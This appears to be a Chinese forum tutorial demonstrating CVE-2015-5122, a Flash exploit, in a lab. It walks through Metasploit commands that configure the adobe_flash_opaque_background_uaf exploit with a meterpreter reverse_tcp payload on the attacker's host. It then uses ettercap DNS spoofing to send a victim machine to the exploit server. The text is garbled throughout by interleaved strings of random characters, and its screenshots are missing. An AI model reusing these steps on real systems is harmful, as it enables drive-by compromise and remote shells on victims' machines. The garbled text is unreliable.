cve2015-5122漏洞实例演示虚拟机

admin

二、cve2015-5122漏洞实例演示虚拟机 5 r5 A! ]5 q6 n

0 c8 _* g0 ~4 M w) L4 d; `   关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图：

search cve-2015-5122如图： 0 [: s6 {/ g$ D: \2 c

2 e; b* |- ~6 v0 C- {9 X* n- A8 B8 k   & R" Y# J8 M/ z+ m

5 p: {& H1 b( \! c8 j

& O% `- N9 D" V) a' w 下面我们敲如下命令：

; p! e! c$ s& P! z6 K% A

$ |, ]0 Q: @5 W6 G3 ]' W use exploit/multi/browser/adobe_flash_opaque_background_uaf

I/ k' {4 U3 [6 G U4 S

set PAYLOAD windows/meterpreter/reverse_tcp

: u, E/ v z; l: F" n) R# z

I" g$ R9 ^4 a v/ q set LHOST 192.168.0.109 9 w% X9 h& ?( M" ^

/ X- } z; f) Z. w# A% f* ` set URIPATH /                        /*根目录*/ - o: w c* M9 ], I3 [! Z

) ^% d# A1 z7 Z& l" @8 q

# O; x7 a3 J3 _9 l3 \ set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址

: \$ l' ~6 _/ u. x

set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 9 f+ T8 P$ W- P! F

. B \1 g: D$ @8 Q- s+ ?

: F% h5 `) u6 x4 Y/ T 然后show options如图： , D8 t0 U* T, f9 n: Y% D0 u! N

' Z, M5 g( o6 U# r

  # |# c# g6 y' `

9 M6 ?* ?$ a7 r' R6 A

一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
7 F# U2 V" P% Q2 n, l# `2 y& ~

4 X+ q6 {! `9 d) A5 |! k/ w9 B6 ?" ` 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115

# x! I3 A1 C7 g9 {3 B2 w

f" e& L2 k; Q Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf

  - O9 `! H0 ^& R' m- h' \( D

成功了，这时候我们断开ettercap，如图： e% W. u. G( H4 B( P# B' G: l

$ R c$ w- D) c& [) z1 q

9 G- x- E6 W/ s& {  

Screenshot如图：

1 S: b2 e% Y. w7 m- e E( @   " x% B( Q4 [0 z/ B' o( \& z l

$ ^8 F1 l* p+ A0 D* k